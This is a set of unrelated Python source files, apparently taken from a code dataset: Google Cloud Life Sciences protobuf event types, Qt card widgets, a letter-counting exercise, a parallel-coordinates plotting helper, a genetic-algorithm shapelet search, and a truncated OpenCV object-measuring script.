[google.cloud.lifesciences.v2beta.PullStartedEvent][google.cloud.lifesciences.v2beta.PullStartedEvent]. pull_stopped (google.cloud.lifesciences_v2beta.types.PullStoppedEvent): See [google.cloud.lifesciences.v2beta.PullStoppedEvent][google.cloud.lifesciences.v2beta.PullStoppedEvent]. 
container_started (google.cloud.lifesciences_v2beta.types.ContainerStartedEvent): See [google.cloud.lifesciences.v2beta.ContainerStartedEvent][google.cloud.lifesciences.v2beta.ContainerStartedEvent]. container_stopped (google.cloud.lifesciences_v2beta.types.ContainerStoppedEvent): See [google.cloud.lifesciences.v2beta.ContainerStoppedEvent][google.cloud.lifesciences.v2beta.ContainerStoppedEvent]. container_killed (google.cloud.lifesciences_v2beta.types.ContainerKilledEvent): See [google.cloud.lifesciences.v2beta.ContainerKilledEvent][google.cloud.lifesciences.v2beta.ContainerKilledEvent]. unexpected_exit_status (google.cloud.lifesciences_v2beta.types.UnexpectedExitStatusEvent): See [google.cloud.lifesciences.v2beta.UnexpectedExitStatusEvent][google.cloud.lifesciences.v2beta.UnexpectedExitStatusEvent]. failed (google.cloud.lifesciences_v2beta.types.FailedEvent): See [google.cloud.lifesciences.v2beta.FailedEvent][google.cloud.lifesciences.v2beta.FailedEvent]. """ timestamp = proto.Field( proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp, ) description = proto.Field( proto.STRING, number=2, ) delayed = proto.Field( proto.MESSAGE, number=17, oneof='details', message='DelayedEvent', ) worker_assigned = proto.Field( proto.MESSAGE, number=18, oneof='details', message='WorkerAssignedEvent', ) worker_released = proto.Field( proto.MESSAGE, number=19, oneof='details', message='WorkerReleasedEvent', ) pull_started = proto.Field( proto.MESSAGE, number=20, oneof='details', message='PullStartedEvent', ) pull_stopped = proto.Field( proto.MESSAGE, number=21, oneof='details', message='PullStoppedEvent', ) container_started = proto.Field( proto.MESSAGE, number=22, oneof='details', message='ContainerStartedEvent', ) container_stopped = proto.Field( proto.MESSAGE, number=23, oneof='details', message='ContainerStoppedEvent', ) container_killed = proto.Field( proto.MESSAGE, number=24, oneof='details', message='ContainerKilledEvent', ) unexpected_exit_status = proto.Field( 
proto.MESSAGE, number=25, oneof='details', message='UnexpectedExitStatusEvent', ) failed = proto.Field( proto.MESSAGE, number=26, oneof='details', message='FailedEvent', ) class DelayedEvent(proto.Message): r"""An event generated whenever a resource limitation or transient error delays execution of a pipeline that was otherwise ready to run. Attributes: cause (str): A textual description of the cause of the delay. The string can change without notice because it is often generated by another service (such as Compute Engine). metrics (Sequence[str]): If the delay was caused by a resource shortage, this field lists the Compute Engine metrics that are preventing this operation from running (for example, ``CPUS`` or ``INSTANCES``). If the particular metric is not known, a single ``UNKNOWN`` metric will be present. """ cause = proto.Field( proto.STRING, number=1, ) metrics = proto.RepeatedField( proto.STRING, number=2, ) class WorkerAssignedEvent(proto.Message): r"""An event generated after a worker VM has been assigned to run the pipeline. Attributes: zone (str): The zone the worker is running in. instance (str): The worker's instance name. machine_type (str): The machine type that was assigned for the worker. """ zone = proto.Field( proto.STRING, number=1, ) instance = proto.Field( proto.STRING, number=2, ) machine_type = proto.Field( proto.STRING, number=3, ) class WorkerReleasedEvent(proto.Message): r"""An event generated when the worker VM that was assigned to the pipeline has been released (deleted). Attributes: zone (str): The zone the worker was running in. instance (str): The worker's instance name. """ zone = proto.Field( proto.STRING, number=1, ) instance = proto.Field( proto.STRING, number=2, ) class PullStartedEvent(proto.Message): r"""An event generated when the worker starts pulling an image. Attributes: image_uri (str): The URI of the image that was pulled. 
""" image_uri = proto.Field( proto.STRING, number=1, ) class PullStoppedEvent(proto.Message): r"""An event generated when the worker stops pulling an image. Attributes: image_uri (str): The URI of the image that was pulled. """ image_uri = proto.Field( proto.STRING, number=1, ) class ContainerStartedEvent(proto.Message): r"""An event generated when a container starts. Attributes: action_id (int): The numeric ID of the action that started this container. port_mappings (Sequence[google.cloud.lifesciences_v2beta.types.ContainerStartedEvent.PortMappingsEntry]): The container-to-host port mappings installed for this container. This set will contain any ports exposed using the ``PUBLISH_EXPOSED_PORTS`` flag as well as any specified in the ``Action`` definition. ip_address (str): The public IP address that can be used to connect to the container. This field is only populated when at least one port mapping is present. If the instance was created with a private address, this field will be empty even if port mappings exist. """ action_id = proto.Field( proto.INT32, number=1, ) port_mappings = proto.MapField( proto.INT32, proto.INT32, number=2, ) ip_address = proto.Field( proto.STRING, number=3, ) class ContainerStoppedEvent(proto.Message): r"""An event generated when a container exits. Attributes: action_id (int): The numeric ID of the action that started this container. exit_status (int): The exit status of the container. stderr (str): The tail end of any content written to standard error by the container. If the content emits large amounts of debugging noise or contains sensitive information, you can prevent the content from being printed by setting the ``DISABLE_STANDARD_ERROR_CAPTURE`` flag. Note that only a small amount of the end of the stream is captured here. The entire stream is stored in the ``/google/logs`` directory mounted into each action, and can be copied off the machine as described elsewhere. 
""" action_id = proto.Field( proto.INT32, number=1, ) exit_status = proto.Field( proto.INT32, number=2, ) stderr = proto.Field( proto.STRING, number=3, ) class UnexpectedExitStatusEvent(proto.Message): r"""An event generated when the execution of a container results in a non-zero exit status that was not otherwise ignored. Execution will continue, but only actions that are flagged as ``ALWAYS_RUN`` will be executed. Other actions will be skipped. Attributes: action_id (int): The numeric ID of the action that started the container. exit_status (int): The exit status of the container. """ action_id = proto.Field( proto.INT32, number=1, ) exit_status = proto.Field( proto.INT32, number=2, ) class ContainerKilledEvent(proto.Message): r"""An event generated when a container is forcibly terminated by the worker. Currently, this only occurs when the container outlives the timeout specified by the user. Attributes: action_id (int): The numeric ID of the action that started the container. """ action_id = proto.Field( proto.INT32, number=1, ) class FailedEvent(proto.Message): r"""An event generated when the execution of a pipeline has failed. Note that other events can continue to occur after this event. Attributes: code (google.rpc.code_pb2.Code): The Google standard error code that best describes this failure. cause (str): The human-readable description of the cause of the failure. """ code = proto.Field( proto.ENUM, number=1, enum=code_pb2.Code, ) cause = proto.Field( proto.STRING, number=2, ) __all__ = tuple(sorted(__protobuf__.manifest))
nilq/baby-python
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################
# Author: Mu yanru
# Date : 2019.2
# Email : muyanru345@163.com
###################################################################

from dayu_widgets.label import MLabel
from dayu_widgets.tool_button import MToolButton
from dayu_widgets.avatar import MAvatar
from dayu_widgets.divider import MDivider
from dayu_widgets import dayu_theme
from dayu_widgets.mixin import hover_shadow_mixin, cursor_mixin
from dayu_widgets.qt import QWidget, QVBoxLayout, QHBoxLayout, QLabel, QFormLayout, QSize, Qt


@hover_shadow_mixin
@cursor_mixin
class MCard(QWidget):
    """A card widget with an optional title row (avatar image, title text,
    "more" button) above a divider and a user-supplied content widget.

    The mixins add a hover drop-shadow and a pointing-hand cursor.
    """

    def __init__(self, title=None, image=None, size=None, extra=None, type=None, parent=None):
        # NOTE(review): ``type`` is accepted but never used in this body —
        # presumably reserved for styling; confirm before removing.
        super(MCard, self).__init__(parent=parent)
        self.setAttribute(Qt.WA_StyledBackground)
        # 'border' is a QSS property toggled later by border().
        self.setProperty('border', False)
        size = size or dayu_theme.default_size
        # Maps dayu size -> (title heading level, title padding in px).
        map_label = {
            dayu_theme.large: (MLabel.H2Level, 20),
            dayu_theme.medium: (MLabel.H3Level, 15),
            dayu_theme.small: (MLabel.H4Level, 10),
        }
        self._title_label = MLabel(text=title)
        self._title_label.set_dayu_level(map_label.get(size)[0])

        padding = map_label.get(size)[-1]
        self._title_layout = QHBoxLayout()
        self._title_layout.setContentsMargins(padding, padding, padding, padding)
        if image:
            self._title_icon = MAvatar()
            self._title_icon.set_dayu_image(image)
            self._title_icon.set_dayu_size(size)
            self._title_layout.addWidget(self._title_icon)
        self._title_layout.addWidget(self._title_label)
        self._title_layout.addStretch()
        if extra:
            # Only created when ``extra`` is truthy: get_more_button() raises
            # AttributeError otherwise.
            self._extra_button = MToolButton().icon_only().svg('more.svg')
            self._title_layout.addWidget(self._extra_button)

        self._content_layout = QVBoxLayout()

        self._main_lay = QVBoxLayout()
        self._main_lay.setSpacing(0)
        self._main_lay.setContentsMargins(1, 1, 1, 1)
        if title:
            self._main_lay.addLayout(self._title_layout)
            self._main_lay.addWidget(MDivider())
        self._main_lay.addLayout(self._content_layout)
        self.setLayout(self._main_lay)

    def get_more_button(self):
        """Return the 'more' tool button (only exists when extra was given)."""
        return self._extra_button

    def set_widget(self, widget):
        """Place *widget* into the card's content area."""
        self._content_layout.addWidget(widget)

    def border(self):
        """Enable the card border via QSS property and return self (fluent)."""
        self.setProperty('border', True)
        self.style().polish(self)
        return self


@hover_shadow_mixin
@cursor_mixin
class MMeta(QWidget):
    """A media-style card: cover image on top, then avatar + title + optional
    'more' button, then a word-wrapped description, filled via setup_data().
    """

    def __init__(self, cover=None, avatar=None, title=None, description=None, extra=False, parent=None):
        # NOTE(review): cover/avatar/title/description args are accepted but
        # the actual content is supplied later through setup_data().
        super(MMeta, self).__init__(parent)
        self.setAttribute(Qt.WA_StyledBackground)
        self._cover_label = QLabel()
        self._avatar = MAvatar()
        self._title_label = MLabel().h4()
        self._description_label = MLabel().secondary()
        self._description_label.setWordWrap(True)
        self._description_label.set_elide_mode(Qt.ElideRight)
        self._title_layout = QHBoxLayout()
        self._title_layout.addWidget(self._title_label)
        self._title_layout.addStretch()
        self._extra_button = MToolButton(parent=self).icon_only().svg('more.svg')
        self._title_layout.addWidget(self._extra_button)
        self._extra_button.setVisible(extra)

        content_lay = QFormLayout()
        content_lay.setContentsMargins(5, 5, 5, 5)
        content_lay.addRow(self._avatar, self._title_layout)
        content_lay.addRow(self._description_label)

        self._button_layout = QHBoxLayout()

        main_lay = QVBoxLayout()
        main_lay.setSpacing(0)
        main_lay.setContentsMargins(1, 1, 1, 1)
        main_lay.addWidget(self._cover_label)
        main_lay.addLayout(content_lay)
        main_lay.addLayout(self._button_layout)
        main_lay.addStretch()
        self.setLayout(main_lay)
        self._cover_label.setFixedSize(QSize(200, 200))
        # self.setFixedWidth(200)

    def get_more_button(self):
        """Return the 'more' tool button."""
        return self._extra_button

    def setup_data(self, data_dict):
        """Populate the card from *data_dict*.

        Recognized keys: 'title', 'description' (str), 'avatar', 'cover'
        (image objects; 'cover' must support scaledToWidth, i.e. a QPixmap).
        Missing keys hide the corresponding sub-widget.
        """
        if data_dict.get('title'):
            self._title_label.setText(data_dict.get('title'))
            self._title_label.setVisible(True)
        else:
            self._title_label.setVisible(False)
        if data_dict.get('description'):
            self._description_label.setText(data_dict.get('description'))
            self._description_label.setVisible(True)
        else:
            self._description_label.setVisible(False)
        if data_dict.get('avatar'):
            self._avatar.set_dayu_image(data_dict.get('avatar'))
            self._avatar.setVisible(True)
        else:
            self._avatar.setVisible(False)
        if data_dict.get('cover'):
            # Scale the cover to the label's current width, keeping aspect.
            fixed_height = self._cover_label.width()
            self._cover_label.setPixmap(
                data_dict.get('cover').scaledToWidth(fixed_height, Qt.SmoothTransformation))
            self._cover_label.setVisible(True)
        else:
            self._cover_label.setVisible(False)
nilq/baby-python
python
input = "hello my name is sparta" def find_max_occurred_alphabet(string): alphabet_occurrence_array = [0] * 26 for char in string: if not char.isalpha(): continue arr_index = ord(char) - ord("a") alphabet_occurrence_array[arr_index] += 1 result = find_max_occurred_alphabet(input) print(result)
nilq/baby-python
python
import itertools

import numpy as np
from sklearn.preprocessing import scale
import matplotlib.pyplot as plt
from matplotlib import collections as mc

# TODO: document it and wrap it as pip package, make ipynb example


def get_cmap(n, name='hsv'):
    """
    Returns a function that maps each index in 0, 1, ..., n-1 to a distinct
    RGB color; the keyword argument name must be a standard mpl colormap name.
    """
    return plt.cm.get_cmap(name, n + 1)  # +1 otherwise last color is almost like first one


def get_y_min_max(nparr):
    """
    Return (min, max) of a numpy array, each padded outward by 5% of the
    (max - min) range, for use as plot y-limits.
    """
    ymin, ymax = np.amin(nparr), np.amax(nparr)
    length = ymax - ymin
    ymin -= 0.05 * length
    ymax += 0.05 * length
    return ymin, ymax


def get_paracoord_plot(values, labels=None, color_dict=None, save_path=None, format='png', dim=(100, 50),
                       linewidths=1, set_legend=False, box=False, show_vertical_axis=True, ylims=None,
                       do_scale=None, show=True):
    """
    Build a parallel-coordinates plot of `values` (one polyline per row).

    :param values: 2-dimensional numpy array; rows are observations, columns
        are the parallel axes
    :param labels: optional, array containing one label per row of `values`,
        used to color the lines
    :param color_dict: dict, optional, ignored if `labels` not provided.
        {label -> color} dict. If `labels` is provided but not `color_dict`,
        a color is chosen automatically per label
    :param save_path: path to the file where the resulting image is stored.
        If not provided, the image is not stored
    :param format: str, format of the saved image, one of ['png', 'jpg', 'svg']
    :param dim: (int, int), target dimension (in pixels) of the image (saved
        files may differ slightly because of tight bounding boxes)
    :param linewidths: int, width (in px) of the plotted line(s)
    :param set_legend: boolean, ignored if `labels` not provided. Whether to
        draw a color legend for the labels
    :param box: boolean, whether to keep the axes frame/ticks around the plot
    :param show_vertical_axis: boolean, whether to draw one vertical line per
        coordinate axis
    :param ylims: (ymin, ymax); defaults to get_y_min_max(values) if omitted
    :param do_scale: boolean. If True, `ylims` is ignored and `values` are
        standardized column-wise (zero mean, unit std)
    :param show: boolean, whether to display the image even when it is saved
        (if not saved it is shown regardless)
    :return: None — the figure is shown and/or saved, then closed
    """
    dpi = 100
    figsize = (dim[0] / dpi, dim[1] / dpi)
    fig, ax = plt.subplots(figsize=figsize, dpi=dpi)
    # One short segment per adjacent column pair, per row.
    segments = [[(i, values[j, i]), (i + 1, values[j, i + 1])] for j in range(values.shape[0])
                for i in range(values.shape[1] - 1)]
    if labels is not None:
        labels = np.array(labels)
        distinct_labels = list(set(labels))
        assert labels.shape[0] == values.shape[0], 'there must be as much labels as rows in values, ' \
            'here: {} labels for {} rows in values'.format(labels.shape[0], values.shape[0])
        if color_dict is not None:
            assert set(list(labels)) == set(color_dict.keys()), 'the keys of color_dict and the labels must be the same'
        else:
            cmap = get_cmap(len(distinct_labels))
            color_dict = {distinct_labels[i]: cmap(i) for i in range(len(distinct_labels))}
        # Repeat each row's color once per segment of that row.
        colors = list(itertools.chain.from_iterable([[color_dict[l]] * (values.shape[1] - 1) for l in list(labels)]))
        lcs = []
        for color_value in color_dict.values():
            # Divide segments by color
            segments_color = [segments[i] for i in range(len(segments)) if colors[i] == color_value]
            lc = mc.LineCollection(segments_color, linewidths=linewidths, colors=color_value)
            ax.add_collection(lc)
            lcs.append(lc)
        if set_legend:
            ax.legend(lcs, distinct_labels, bbox_to_anchor=(1, 1))
    else:
        lc = mc.LineCollection(segments, linewidths=linewidths, colors='b')
        ax.add_collection(lc)
    ax.autoscale()
    if do_scale:
        # NOTE(review): segments were built from the *unscaled* values above,
        # so scaling here only affects the y-limits — confirm this is intended.
        values = scale(values, axis=0, copy=True)
    if ylims is None or do_scale:
        ymin, ymax = get_y_min_max(values)
    else:
        ymin, ymax = ylims[0], ylims[1]
    if show_vertical_axis:
        for i in range(values.shape[1]):
            ax.axvline(x=i, ymin=ymin, ymax=ymax, color='k')
    if not box:
        plt.tick_params(top='off', bottom='off', left='off', right='off',
                        labelleft='off', labelbottom='off')
        plt.box(False)
    plt.xlim(0, values.shape[1])
    plt.ylim(ymin, ymax)
    if save_path is not None:
        assert format in ['png', 'jpg', 'svg'], 'format must belong to [\'png\', \'jpg\', \'svg\']'
        plt.savefig(save_path, bbox_inches='tight', format=format, pad_inches=0)
        if show:
            plt.show()
    else:
        plt.show()
    # Clear the current axes.
    plt.cla()
    # Clear the current figure.
    plt.clf()
    # Closes all the figure windows.
    plt.close('all')
nilq/baby-python
python
import numpy as np
import pandas as pd
import time
import os
import sys
from copy import copy
from fastdtw import fastdtw
from scipy import interpolate
from scipy.stats import levy, zscore, mode
from sklearn.metrics import silhouette_score
from sklearn.metrics.pairwise import *
from scipy.spatial.distance import *
from sklearn.linear_model import LogisticRegression
from sklearn.cluster import DBSCAN


def pairwise_fastdtw(X, **kwargs):
    """Return the symmetric pairwise FastDTW distance matrix for the
    sequences in X. Each sequence is converted to (index, value) pairs,
    only the upper triangle is computed, then mirrored below the diagonal.
    """
    X = [list(enumerate(pattern)) for pattern in X]
    triu = [fastdtw(X[i], X[j], **kwargs)[0] if i != j else 0
            for i in range(len(X)) for j in range(i, len(X))]
    matrix = np.zeros([len(X)] * 2)
    matrix[np.triu_indices(len(X))] = triu
    matrix += np.tril(matrix.T, -1)
    return matrix


class individual:
    """GA chromosome: parallel lists of segment start indices and segment
    lengths into the time series, plus the DBSCAN cluster labels assigned
    by the last evaluation (None until evaluated).
    """

    def __init__(self, start: list = None, slen: list = None):
        # Fresh lists per instance — avoids the mutable-default-argument trap.
        if start is None:
            start = []
        if slen is None:
            slen = []
        self.start = start
        self.slen = slen
        self.cluster = None


class genshapelet:
    """Genetic algorithm that searches a time series for a set of
    non-overlapping windows (shapelet candidates) whose pairwise-distance
    clustering (DBSCAN) has maximal silhouette score.

    The input CSV is read with no header; column 0 is used as the class
    label of each row and column 1 as the series value (see evaluate()).
    """

    def __init__(self, ts_path: 'path to file', nsegments, min_support, smin, smax, output_folder=''):
        self.ts = pd.read_csv(ts_path, header=None)
        self.ts_path = ts_path
        self.nsegments = nsegments
        if self.nsegments is None:
            # Default: enough windows of max size to tile half the series.
            self.nsegments = int(len(self.ts) / (2 * smax) + 1)
        if self.nsegments < 2:
            sys.exit('nsegments must be at least 2 for computing clustering quality')
        self.min_support = min_support
        self.smin = smin  # minimum window length
        self.smax = smax  # maximum window length
        if os.path.exists(output_folder):
            pass
        elif os.access(output_folder, os.W_OK):
            pass
        else:
            sys.exit('output_folder not createable.')
        self.output_folder = output_folder
        # Expected two mutations/crossovers per individual per generation.
        self.probability = 2 / self.nsegments
        self.random_walk = False

    def run(self, popsize: dict(type=int, help='> 3, should be odd'),
            sigma: dict(type=float, help='mutation factor'), t_max,
            pairwise_distmeasures=[
                (pairwise_distances, {'metric': 'cosine'}),
                (pairwise_distances, {'metric': 'chebyshev'}),
                (pairwise_distances, {'metric': 'euclidean'}),
                (pairwise_fastdtw, {'dist': euclidean})],
            fusion=True, notes=''):
        """Run the GA for t_max minutes; write best shapelets + fitness curve.

        Valid metric names for pairwise_distances:
        from scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
        'manhattan']; from scipy.spatial.distance: ['braycurtis', 'canberra',
        'chebyshev', 'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski',
        'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto', 'russellrao',
        'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean', 'yule'].
        """
        print('-->')
        # print('working with ' + str(self.nsegments) + ' windows')
        t_max *= 60  # minutes -> seconds
        t_start = time.time()
        population, fitness = [], []
        for i in range(0, popsize):
            population.append(self.make_individual())
            fitness.append(self.evaluate(population[i], pairwise_distmeasures, fusion))
        fitness_curve = []
        best_fit = -np.inf
        iterations = 0
        t_elapsed = time.time() - t_start
        while(t_elapsed < t_max):
            order = np.argsort(fitness)[::-1]  # indices sorted by fitness, best first
            ix_maxfitness = order[0]
            if(fitness[ix_maxfitness] > best_fit):
                best_fit = fitness[ix_maxfitness]
                fitness_curve.append((t_elapsed, iterations, best_fit))
                # print((t_elapsed, iterations, best_fit))
            # if(iterations % 500) == 0:
            #     print((t_elapsed, iterations, best_fit))
            new_population = []
            new_population.append(population[ix_maxfitness])  # elite
            fitness[0] = fitness[ix_maxfitness]
            if self.random_walk:
                # Baseline mode: regenerate everyone except the elite.
                for i in range(1, popsize):
                    new_population.append(self.make_individual())
                    fitness[i] = self.evaluate(population[i], pairwise_distmeasures, fusion)
            else:
                # First half (pairs): crossover + mutate the fittest survivors.
                for i in range(1, int(popsize / 2), 2):
                    new_population.append(population[order[i]])
                    new_population.append(population[order[i + 1]])
                    self.crossover(new_population[i], new_population[i + 1])
                    self.mutate(new_population[i], sigma)
                    self.mutate(new_population[i + 1], sigma)
                    fitness[i] = self.evaluate(new_population[i], pairwise_distmeasures, fusion)
                    fitness[i + 1] = self.evaluate(new_population[i + 1], pairwise_distmeasures, fusion)
                # Second half: fresh random individuals for diversity.
                for i in range(int(popsize / 2), popsize):
                    new_population.append(self.make_individual())
                    fitness[i] = self.evaluate(new_population[i], pairwise_distmeasures, fusion)
            population = new_population
            iterations += 1
            t_elapsed = time.time() - t_start
        ix_maxfitness = np.argmax(fitness)
        fitness_curve.append((t_max, iterations, fitness[ix_maxfitness]))
        # print('t_elapsed: ' + str(t_elapsed))
        # print('iterations: ' + str(iterations))
        # print('fitness: ' + str(fitness[ix_maxfitness]))
        name = self.make_filename(popsize, sigma, t_max, notes)
        self.write_shapelets(population[ix_maxfitness], name)
        self.write_fitness(fitness_curve, name)
        # print(population[ix_maxfitness].start)
        # print(population[ix_maxfitness].slen)
        # print(population[ix_maxfitness].cluster)
        # print(self.evaluate(population[ix_maxfitness], pairwise_distmeasures, fusion))
        print('--<')
        return 0

    def evaluate(self, x: individual, pairwise_distmeasures, fusion):
        """Score individual x: extract its windows, z-normalize and upsample
        them to length smax, compute (fused) pairwise distances, cluster with
        DBSCAN, and return the silhouette score (-inf on failure).
        Side effect: stores the cluster labels on x.cluster.
        """
        # get patterns from individual
        patterns, classlabels = [], []
        for i in range(len(x.start)):
            df = self.ts.loc[x.start[i]:x.start[i] + x.slen[i] - 1, :]
            # Majority class label of the window (column 0).
            classlabels.append(mode(df.loc[:, [0]])[0][0][0])  # xD
            df = df.loc[:, [1]].apply(zscore).fillna(0)  # consider extending for multivariate ts
            # Cubic upsampling so all patterns share length smax.
            upsampled_ix = np.linspace(0, len(df) - 1, self.smax)  # upsampling
            new_values = interpolate.interp1d(np.arange(len(df)), np.array(df).flatten(), kind='cubic')(upsampled_ix)
            patterns.append(new_values)
        patterns = np.array(patterns)
        classlabels = np.array(classlabels)
        # print('patterns\n' + str(patterns))  # DEBUG
        # print('classlabels ' + str(classlabels))  # DEBUG
        distances = {}
        cols = len(patterns)
        # One upper-triangle distance vector per measure.
        for measure, params in pairwise_distmeasures:
            distances[str(measure) + str(params)] = measure(patterns, **params)[np.triu_indices(cols)]
        distances = pd.DataFrame(distances)
        if fusion:
            # Fuse the measures: logistic regression predicting "different
            # class" from the distance columns; use P(different) as distance.
            clf = LogisticRegression()
            different_class = np.zeros([cols] * 2)
            different_class[classlabels[:, None] != classlabels] = 1
            different_class = different_class[np.triu_indices(cols)]
            if 1 in different_class:
                clf.fit(distances, different_class)
                combined_distance = clf.predict_proba(distances)[:, 1]
            else:
                # All windows share one class — fusion target is degenerate.
                return -np.inf
            dist_matrix = np.zeros([cols] * 2)
            dist_matrix[np.triu_indices(cols)] = combined_distance
            dist_matrix += np.tril(dist_matrix.T, -1)
        else:
            measure, params = pairwise_distmeasures[0]
            dist_matrix = measure(patterns, **params)
        # print('dist_matrix\n' + str(dist_matrix))  # DEBUG
        # epsilon! consider: eps=dist_matrix.mean()/1.5
        db = DBSCAN(eps=dist_matrix.mean(), min_samples=self.min_support,
                    metric='precomputed', n_jobs=-1).fit(dist_matrix)
        x.cluster = db.labels_
        try:
            fitness = silhouette_score(dist_matrix, x.cluster)
        except Exception as e:
            # silhouette_score raises when there are <2 clusters.
            fitness = -np.inf
        # print(fitness)  # DEBUG
        return fitness

    def validate(self, x):
        """Return False if any two windows of x overlap, else True."""
        order = np.argsort(x.start)
        for i in range(len(order)):
            for j in range(1, len(order) - i):
                # Windows more than smax apart cannot overlap.
                if(x.start[order[i + j]] - x.start[order[i]] > self.smax):
                    break
                if(x.start[order[i]] + x.slen[order[i]] > x.start[order[i + j]]):
                    return False
        return True

    def mutate(self, x, sigma):
        """Levy-flight mutation of each window (with prob. self.probability);
        a mutation that creates overlaps is rolled back.
        """
        for i in range(len(x.start)):
            if(np.random.uniform() < self.probability):
                tmp_start, tmp_slen = copy(x.start[i]), copy(x.slen[i])
                x.slen[i] += int(sigma * (self.smax + 1 - self.smin) * levy.rvs())
                # Wrap length back into [smin, smax].
                x.slen[i] = (x.slen[i] - self.smin) % (self.smax + 1 - self.smin) + self.smin
                x.start[i] = (x.start[i] + int(sigma * len(self.ts) * levy.rvs())) % (len(self.ts) - x.slen[i])
                if not self.validate(x):
                    x.start[i], x.slen[i] = copy(tmp_start), copy(tmp_slen)
        return 0

    def crossover(self, x, y):
        """Uniform crossover: swap window i between x and y with prob.
        self.probability; swaps producing overlaps are rolled back per parent.
        """
        for i in range(min(len(x.start), len(y.start))):
            if(np.random.uniform() < self.probability):
                tmp_start_x, tmp_slen_x = copy(x.start[i]), copy(x.slen[i])
                tmp_start_y, tmp_slen_y = copy(y.start[i]), copy(y.slen[i])
                x.start[i], y.start[i] = y.start[i], x.start[i]
                x.slen[i], y.slen[i] = y.slen[i], x.slen[i]
                if not self.validate(x):
                    x.start[i], x.slen[i] = copy(tmp_start_x), copy(tmp_slen_x)
                if not self.validate(y):
                    y.start[i], y.slen[i] = copy(tmp_start_y), copy(tmp_slen_y)
        return 0

    def write_fitness(self, x: 'fitness curve', filename):
        """Dump the (t_elapsed, iterations, best_fit) curve to CSV."""
        df = pd.DataFrame(x)
        df.to_csv(self.output_folder + '/' + filename + '.fitness.csv', index=False, header=False)

    def write_shapelets(self, x: individual, filename):
        """Dump the individual's windows (start, slen, cluster) to CSV,
        sorted by cluster; -2 marks a never-evaluated individual.
        """
        out = {}
        out['start'] = [start for start in x.start]
        out['slen'] = [slen for slen in x.slen]
        out['cluster'] = [cluster for cluster in x.cluster] if x.cluster is not None else [-2] * len(x.start)
        df = pd.DataFrame(out, columns=['start', 'slen', 'cluster'])
        df.sort_values('cluster', inplace=True)  # unordered indizes .reset_index(inplace=True, drop=True)
        df.to_csv(self.output_folder + '/' + filename + '.shapelets.csv', index=False)
        return 0

    def make_filename(self, popsize, sigma, t_max, notes):
        """Encode dataset name and all hyper-parameters into an output stem."""
        filename = os.path.splitext(os.path.basename(self.ts_path))[0]  # get name without path and extension
        motifs = str(self.nsegments) + 'x' + str(self.min_support) + 'motifs'
        window_length = str(self.smin) + '-' + str(self.smax) + 'window'
        hyperparameter = str(popsize) + '_' + str(sigma) + '_' + str(t_max / 60) + '_' + str(notes)
        return 'genshapelet_' + filename + '_' + motifs + '_' + window_length + '_' + hyperparameter

    def make_individual(self):
        """Sample a random individual with (up to) nsegments non-overlapping
        windows; a window failing placement 5 times is dropped and sampling
        stops early.
        """
        x = individual()
        for i in range(self.nsegments):
            x.slen.append(np.random.randint(self.smin, self.smax + 1))
            x.start.append(np.random.randint(0, len(self.ts) - x.slen[i]))
            valid = False
            attempts = 5  # this is random, right; but the whole should stay random so .. ¯\_(ツ)_/¯
            while(not valid and attempts > 0):
                valid = True
                for j in range(i):
                    if((x.start[i] + x.slen[i] <= x.start[j]) or (x.start[j] + x.slen[j] <= x.start[i])):
                        continue
                    else:
                        valid = False
                        attempts -= 1
                        x.start[i] = np.random.randint(0, len(self.ts) - x.slen[i])
                        break
            if (attempts == 0):
                # print('The individual isn\'t complete. Check nsegments and smax parameter.')
                x.slen.pop()
                x.start.pop()
                break
        return x
python
import cv2
import math
import time
import numpy as np

# Pixel-to-millimeter conversion factor for the measurement overlay.
# NOTE(review): presumably calibrated for one specific camera setup — verify.
mmRatio = 0.1479406021
scale = 2  # display downscale factor
frameWidth = 2304
frameHeight = 1536
frameCroopY = [650, 950]  # vertical crop band (y-range) processed per frame
windowsName = 'Window Name'


def playvideo():
    """Capture from camera 0 and display processed frames until the stream
    ends or ESC (key code 27) is pressed.
    """
    vid = cv2.VideoCapture(0)
    vid.set(cv2.CAP_PROP_FRAME_WIDTH, frameWidth)
    vid.set(cv2.CAP_PROP_FRAME_HEIGHT, frameHeight)
    while(True):
        ret, frame = vid.read()
        if not ret:
            vid.release()
            print('release')
            break
        frame = processFrame(frame)
        cv2.namedWindow(windowsName)
        cv2.startWindowThread()
        cv2.imshow(windowsName, frame)
        k = cv2.waitKey(1)
        if k == 27:  # ESC quits
            break
    cv2.destroyAllWindows()


def processFrame(frame):
    """Detect rectangular objects in the cropped frame band and annotate them
    with their size in millimeters.

    Returns the edge image stacked above the annotated color frame, both
    downscaled by ``scale``.
    """
    frame = frame[frameCroopY[0]:frameCroopY[1], 0:frameWidth]
    liveFrame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
    # liveFrame = cv2.medianBlur(liveFrame, 1)
    # frame, kernel, x, y
    # liveFrame = cv2.GaussianBlur(liveFrame, (9, 9), 0)
    # frame, sigmaColor, sigmaSpace, borderType
    liveFrame = cv2.bilateralFilter(liveFrame, 10, 50, cv2.BORDER_WRAP)
    # _, liveFrame = cv2.threshold(liveFrame, 220, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
    liveFrame = cv2.Canny(liveFrame, 75, 150, 9)
    # cv2.goodFeaturesToTrack(img,maxCorners,qualityLevel, minDistance, corners, mask, blockSize, useHarrisDetector)
    corners = cv2.goodFeaturesToTrack(liveFrame, 2000, 0.01, 10)
    if corners is not None:
        corners = np.int0(corners)
        # Thicken each detected corner on the edge image so contours close.
        for i in corners:
            x, y = i.ravel()
            cv2.rectangle(liveFrame, (x - 1, y - 1), (x + 1, y + 1), (255, 255, 255), -100)
            # cv2.circle(liveFrame, (x, y), 3, 255, -1)
    # NOTE(review): 3-value unpack matches the OpenCV 3.x findContours API.
    _, cnts, _ = cv2.findContours(
        liveFrame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    for c in cnts:
        # detect aproximinated contour
        peri = cv2.arcLength(c, True)
        approx = cv2.approxPolyDP(c, 0.04 * peri, True)
        # cv2.drawContours(frame, [approx], 0, (255, 0, 0), 1)
        x, y, w, h = cv2.boundingRect(c)
        # draw a green rectangle to visualize the bounding rect
        cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
        if len(approx) == 4:  # quadrilateral candidates only
